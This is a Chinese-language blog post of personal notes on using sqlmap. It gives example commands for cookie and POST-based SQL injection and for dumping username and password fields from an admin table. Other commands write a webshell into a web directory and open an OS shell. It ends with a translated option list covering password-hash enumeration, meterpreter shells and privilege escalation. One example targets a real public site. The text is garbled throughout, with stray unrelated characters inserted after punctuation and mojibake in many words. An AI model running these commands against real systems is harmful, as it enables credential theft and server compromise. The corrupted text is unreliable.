Sqlmap使用教程【個人筆記精華整理】

2015-8-15 sqlmap, sql注入, 滲透教程 滲透教程 117170次訪問

sqlmap也是滲透中常用的一個注入工具，其實在注入工具方面，一個sqlmap就足夠用了贩毕，只要你用的熟丝蹭，秒殺各種工具同窘，只是一個便捷性問題蛉谜，sql注入另一方面就是手工黨了讼庇，這個就另當別論了。

今天把我一直以來整理的sqlmap筆記發(fā)布上來供大家參考。

sqlmap教程

教程說明

學(xué)習sqlmap前砾省，建議了解SQL注入實現(xiàn)原理與基本的手工注入操作鸡岗，更易于理解sqlmap的使用。

我的另一個筆記整理：可能是網(wǎng)上最易懂的SQL手工注入教程【個人筆記精華整理】

針對sqlmap注入過waf编兄，可以參考：sqlmap注入之tamper繞過WAF防火墻過濾

sqlmap簡介

sqlmap支持五種不同的注入模式：

• 1纤房、基于布爾的盲注，即可以根據(jù)返回頁面判斷條件真假的注入翻诉。
• 2、基于時間的盲注捌刮，即不能根據(jù)頁面返回內(nèi)容判斷任何信息碰煌，用條件語句查看時間延遲語句是否執(zhí)行（即頁面返回時間是否增加）來判斷。
• 3绅作、基于報錯注入芦圾，即頁面會返回錯誤信息，或者把注入的語句的結(jié)果直接返回在頁面中俄认。
• 4个少、聯(lián)合查詢注入，可以使用union的情況下的注入眯杏。
• 5夜焦、堆查詢注入，可以同時執(zhí)行多條語句的執(zhí)行時的注入岂贩。

sqlmap支持的數(shù)據(jù)庫有

MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB

檢測注入

基本格式

sqlmap -u “http://www.vuln.cn/post.php?id=1”

默認使用level1檢測全部數(shù)據(jù)庫類型

sqlmap -u “http://www.vuln.cn/post.php?id=1”  –dbms mysql –level 3

指定數(shù)據(jù)庫類型為mysql茫经，級別為3（共5級，級別越高萎津，檢測越全面）

跟隨302跳轉(zhuǎn)

當注入頁面錯誤的時候卸伞，自動跳轉(zhuǎn)到另一個頁面的時候需要跟隨302，
當注入錯誤的時候锉屈，先報錯再跳轉(zhuǎn)的時候荤傲，不需要跟隨302。
目的就是：要追蹤到錯誤信息颈渊。

cookie注入

當程序有防get注入的時候遂黍，可以使用cookie注入

sqlmap -u “http://www.baidu.com/shownews.asp” –cookie “id=11” –level 2（只有l(wèi)evel達到2才會檢測cookie）

從post數(shù)據(jù)包中注入

可以使用burpsuite或者temperdata等工具來抓取post包

sqlmap -r “c:\tools\request.txt” -p “username” –dbms mysql    指定username參數(shù)

注入成功后

獲取數(shù)據(jù)庫基本信息

sqlmap -u “http://www.vuln.cn/post.php?id=1”  –dbms mysql –level 3 –dbs

查詢有哪些數(shù)據(jù)庫

sqlmap -u “http://www.vuln.cn/post.php?id=1”  –dbms mysql –level 3 -D test –tables

查詢test數(shù)據(jù)庫中有哪些表

sqlmap -u “http://www.vuln.cn/post.php?id=1”  –dbms mysql –level 3 -D test -T admin –columns

查詢test數(shù)據(jù)庫中admin表有哪些字段

sqlmap -u “http://www.vuln.cn/post.php?id=1”  –dbms mysql –level 3 -D test -T admin -C “username,password” –dump

dump出字段username與password中的數(shù)據(jù)

其他命令參考下面

從數(shù)據(jù)庫中搜索字段

sqlmap -r “c:\tools\request.txt” –dbms mysql -D dedecms –search -C admin,password
在dedecms數(shù)據(jù)庫中搜索字段admin或者password。

讀取與寫入文件

首先找需要網(wǎng)站的物理路徑俊嗽，其次需要有可寫或可讀權(quán)限妓湘。

–file-read=RFILE 從后端的數(shù)據(jù)庫管理系統(tǒng)文件系統(tǒng)讀取文件 （物理路徑）
–file-write=WFILE 編輯后端的數(shù)據(jù)庫管理系統(tǒng)文件系統(tǒng)上的本地文件 （mssql xp_shell）
–file-dest=DFILE 后端的數(shù)據(jù)庫管理系統(tǒng)寫入文件的絕對路徑

示例：

sqlmap -r “c:\request.txt” -p id –dbms mysql –file-dest “e:\php\htdocs\dvwa\inc\include\1.php” –file-write “f:\webshell\1112.php”

使用shell命令：

sqlmap -r “c:\tools\request.txt” -p id –dms mysql –os-shell
接下來指定網(wǎng)站可寫目錄：
“E:\php\htdocs\dvwa”

注：mysql不支持列目錄，僅支持讀取單個文件乌询。sqlserver可以列目錄榜贴，不能讀寫文件，但需要一個（xp_dirtree函數(shù)）

sqlmap詳細命令：

*   –is-dba 當前用戶權(quán)限（是否為root權(quán)限）
*   –dbs 所有數(shù)據(jù)庫
*   –current-db 網(wǎng)站當前數(shù)據(jù)庫
*   –users 所有數(shù)據(jù)庫用戶
*   –current-user 當前數(shù)據(jù)庫用戶
*   –random-agent 構(gòu)造隨機user-agent
*   –passwords 數(shù)據(jù)庫密碼
*   –proxy http://local:8080 –threads 10 (可以自定義線程加速) 代理
*   –time-sec=TIMESEC DBMS響應(yīng)的延遲時間（默認為5秒）

——————————————————————————————————

Options（選項）：

• –version 顯示程序的版本號并退出
• -h, –help 顯示此幫助消息并退出
• -v VERBOSE 詳細級別：0-6（默認為1）
• 保存進度繼續(xù)跑：

sqlmap -u “http://url/news?id=1“ –dbs-o “sqlmap.log” 保存進度
sqlmap -u “http://url/news?id=1“ –dbs-o “sqlmap.log” –resume 恢復(fù)已保存進度

Target（目標）：

以下至少需要設(shè)置其中一個選項，設(shè)置目標URL唬党。

*   -d DIRECT 直接連接到數(shù)據(jù)庫鹃共。
*   -u URL, –url=URL 目標URL。
*   -l LIST 從Burp或WebScarab代理的日志中解析目標驶拱。
*   -r REQUESTFILE 從一個文件中載入HTTP請求霜浴。
*   -g GOOGLEDORK 處理Google dork的結(jié)果作為目標URL。
*   -c CONFIGFILE 從INI配置文件中加載選項蓝纲。

Request（請求）：

這些選項可以用來指定如何連接到目標URL阴孟。

*   –data=DATA 通過POST發(fā)送的數(shù)據(jù)字符串
*   –cookie=COOKIE HTTP Cookie頭
*   –cookie-urlencode URL 編碼生成的cookie注入
*   –drop-set-cookie 忽略響應(yīng)的Set – Cookie頭信息
*   –user-agent=AGENT 指定 HTTP User – Agent頭
*   –random-agent 使用隨機選定的HTTP User – Agent頭
*   –referer=REFERER 指定 HTTP Referer頭
*   –headers=HEADERS 換行分開，加入其他的HTTP頭
*   –auth-type=ATYPE HTTP身份驗證類型（基本税迷，摘要或NTLM）(Basic, Digest or NTLM)
*   –auth-cred=ACRED HTTP身份驗證憑據(jù)（用戶名:密碼）
*   –auth-cert=ACERT HTTP認證證書（key_file永丝，cert_file）
*   –proxy=PROXY 使用HTTP代理連接到目標URL
*   –proxy-cred=PCRED HTTP代理身份驗證憑據(jù)（用戶名：密碼）
*   –ignore-proxy 忽略系統(tǒng)默認的HTTP代理
*   –delay=DELAY 在每個HTTP請求之間的延遲時間，單位為秒
*   –timeout=TIMEOUT 等待連接超時的時間（默認為30秒）
*   –retries=RETRIES 連接超時后重新連接的時間（默認3）
*   –scope=SCOPE 從所提供的代理日志中過濾器目標的正則表達式
*   –safe-url=SAFURL 在測試過程中經(jīng)常訪問的url地址
*   –safe-freq=SAFREQ 兩次訪問之間測試請求箭养，給出安全的URL

Enumeration（枚舉）：

這些選項可以用來列舉后端數(shù)據(jù)庫管理系統(tǒng)的信息慕嚷、表中的結(jié)構(gòu)和數(shù)據(jù)。此外毕泌，您還可以運行
您自己的SQL語句喝检。

*   -b, –banner 檢索數(shù)據(jù)庫管理系統(tǒng)的標識
*   –current-user 檢索數(shù)據(jù)庫管理系統(tǒng)當前用戶
*   –current-db 檢索數(shù)據(jù)庫管理系統(tǒng)當前數(shù)據(jù)庫
*   –is-dba 檢測DBMS當前用戶是否DBA
*   –users 枚舉數(shù)據(jù)庫管理系統(tǒng)用戶
*   –passwords 枚舉數(shù)據(jù)庫管理系統(tǒng)用戶密碼哈希
*   –privileges 枚舉數(shù)據(jù)庫管理系統(tǒng)用戶的權(quán)限
*   –roles 枚舉數(shù)據(jù)庫管理系統(tǒng)用戶的角色
*   –dbs 枚舉數(shù)據(jù)庫管理系統(tǒng)數(shù)據(jù)庫
*   -D DBname 要進行枚舉的指定數(shù)據(jù)庫名
*   -T TBLname 要進行枚舉的指定數(shù)據(jù)庫表（如：-T tablename –columns）
*   –tables 枚舉的DBMS數(shù)據(jù)庫中的表
*   –columns 枚舉DBMS數(shù)據(jù)庫表列
*   –dump 轉(zhuǎn)儲數(shù)據(jù)庫管理系統(tǒng)的數(shù)據(jù)庫中的表項
*   –dump-all 轉(zhuǎn)儲所有的DBMS數(shù)據(jù)庫表中的條目
*   –search 搜索列（S），表（S）和/或數(shù)據(jù)庫名稱（S）
*   -C COL 要進行枚舉的數(shù)據(jù)庫列
*   -U USER 用來進行枚舉的數(shù)據(jù)庫用戶
*   –exclude-sysdbs 枚舉表時排除系統(tǒng)數(shù)據(jù)庫
*   –start=LIMITSTART 第一個查詢輸出進入檢索
*   –stop=LIMITSTOP 最后查詢的輸出進入檢索
*   –first=FIRSTCHAR 第一個查詢輸出字的字符檢索
*   –last=LASTCHAR 最后查詢的輸出字字符檢索
*   –sql-query=QUERY 要執(zhí)行的SQL語句
*   –sql-shell 提示交互式SQL的shell

Optimization（優(yōu)化）：

這些選項可用于優(yōu)化SqlMap的性能撼泛。

*   -o 開啟所有優(yōu)化開關(guān)
*   –predict-output 預(yù)測常見的查詢輸出
*   –keep-alive 使用持久的HTTP（S）連接
*   –null-connection 從沒有實際的HTTP響應(yīng)體中檢索頁面長度
*   –threads=THREADS 最大的HTTP（S）請求并發(fā)量（默認為1）

Injection（注入）：

這些選項可以用來指定測試哪些參數(shù)挠说， 提供自定義的注入payloads和可選篡改腳本。

*   -p TESTPARAMETER 可測試的參數(shù)（S）
*   –dbms=DBMS 強制后端的DBMS為此值
*   –os=OS 強制后端的DBMS操作系統(tǒng)為這個值
*   –prefix=PREFIX 注入payload字符串前綴
*   –suffix=SUFFIX 注入payload字符串后綴
*   –tamper=TAMPER 使用給定的腳本（S）篡改注入數(shù)據(jù)

Detection（檢測）：

這些選項可以用來指定在SQL盲注時如何解析和比較HTTP響應(yīng)頁面的內(nèi)容愿题。

*   –level=LEVEL 執(zhí)行測試的等級（1-5纺涤，默認為1）
*   –risk=RISK 執(zhí)行測試的風險（0-3，默認為1）
*   –string=STRING 查詢時有效時在頁面匹配字符串
*   –regexp=REGEXP 查詢時有效時在頁面匹配正則表達式
*   –text-only 僅基于在文本內(nèi)容比較網(wǎng)頁

Techniques（技巧）：

這些選項可用于調(diào)整具體的SQL注入測試抠忘。

*   –technique=TECH SQL注入技術(shù)測試（默認BEUST）
*   –time-sec=TIMESEC DBMS響應(yīng)的延遲時間（默認為5秒）
*   –union-cols=UCOLS 定列范圍用于測試UNION查詢注入
*   –union-char=UCHAR 用于暴力猜解列數(shù)的字符

Fingerprint（指紋）：

*   -f, –fingerprint 執(zhí)行檢查廣泛的DBMS版本指紋

Brute force（蠻力）：

這些選項可以被用來運行蠻力檢查撩炊。

*   –common-tables 檢查存在共同表
*   –common-columns 檢查存在共同列

User-defined function injection（用戶自定義函數(shù)注入）：
這些選項可以用來創(chuàng)建用戶自定義函數(shù)。

–udf-inject 注入用戶自定義函數(shù)
–shared-lib=SHLIB 共享庫的本地路徑

File system access（訪問文件系統(tǒng)）：

這些選項可以被用來訪問后端數(shù)據(jù)庫管理系統(tǒng)的底層文件系統(tǒng)崎脉。

*   –file-read=RFILE 從后端的數(shù)據(jù)庫管理系統(tǒng)文件系統(tǒng)讀取文件
*   –file-write=WFILE 編輯后端的數(shù)據(jù)庫管理系統(tǒng)文件系統(tǒng)上的本地文件
*   –file-dest=DFILE 后端的數(shù)據(jù)庫管理系統(tǒng)寫入文件的絕對路徑

Operating system access（操作系統(tǒng)訪問）：

這些選項可以用于訪問后端數(shù)據(jù)庫管理系統(tǒng)的底層操作系統(tǒng)拧咳。

*   –os-cmd=OSCMD 執(zhí)行操作系統(tǒng)命令
*   –os-shell 交互式的操作系統(tǒng)的shell
*   –os-pwn 獲取一個OOB shell，meterpreter或VNC
*   –os-smbrelay 一鍵獲取一個OOB shell囚灼，meterpreter或VNC
*   –os-bof 存儲過程緩沖區(qū)溢出利用
*   –priv-esc 數(shù)據(jù)庫進程用戶權(quán)限提升
*   –msf-path=MSFPATH Metasploit Framework本地的安裝路徑
*   –tmp-path=TMPPATH 遠程臨時文件目錄的絕對路徑

Windows注冊表訪問：

這些選項可以被用來訪問后端數(shù)據(jù)庫管理系統(tǒng)Windows注冊表骆膝。

*   –reg-read 讀一個Windows注冊表項值
*   –reg-add 寫一個Windows注冊表項值數(shù)據(jù)
*   –reg-del 刪除Windows注冊表鍵值
*   –reg-key=REGKEY Windows注冊表鍵
*   –reg-value=REGVAL Windows注冊表項值
*   –reg-data=REGDATA Windows注冊表鍵值數(shù)據(jù)
*   –reg-type=REGTYPE Windows注冊表項值類型

這些選項可以用來設(shè)置一些一般的工作參數(shù)。

*   -t TRAFFICFILE 記錄所有HTTP流量到一個文本文件中
*   -s SESSIONFILE 保存和恢復(fù)檢索會話文件的所有數(shù)據(jù)
*   –flush-session 刷新當前目標的會話文件
*   –fresh-queries 忽略在會話文件中存儲的查詢結(jié)果
*   –eta 顯示每個輸出的預(yù)計到達時間
*   –update 更新SqlMap
*   –save file保存選項到INI配置文件
*   –batch 從不詢問用戶輸入灶体，使用所有默認配置阅签。

Miscellaneous（雜項）：

*   –beep 發(fā)現(xiàn)SQL注入時提醒
*   –check-payload IDS對注入payloads的檢測測試
*   –cleanup SqlMap具體的UDF和表清理DBMS
*   –forms 對目標URL的解析和測試形式
*   –gpage=GOOGLEPAGE 從指定的頁碼使用谷歌dork結(jié)果
*   –page-rank Google dork結(jié)果顯示網(wǎng)頁排名（PR）
*   –parse-errors 從響應(yīng)頁面解析數(shù)據(jù)庫管理系統(tǒng)的錯誤消息
*   –replicate 復(fù)制轉(zhuǎn)儲的數(shù)據(jù)到一個sqlite3數(shù)據(jù)庫
*   –tor 使用默認的Tor（Vidalia/ Privoxy/ Polipo）代理地址
*   –wizard 給初級用戶的簡單向?qū)Ы缑?

附上大佬的博客地址：http://www.vuln.cn/1992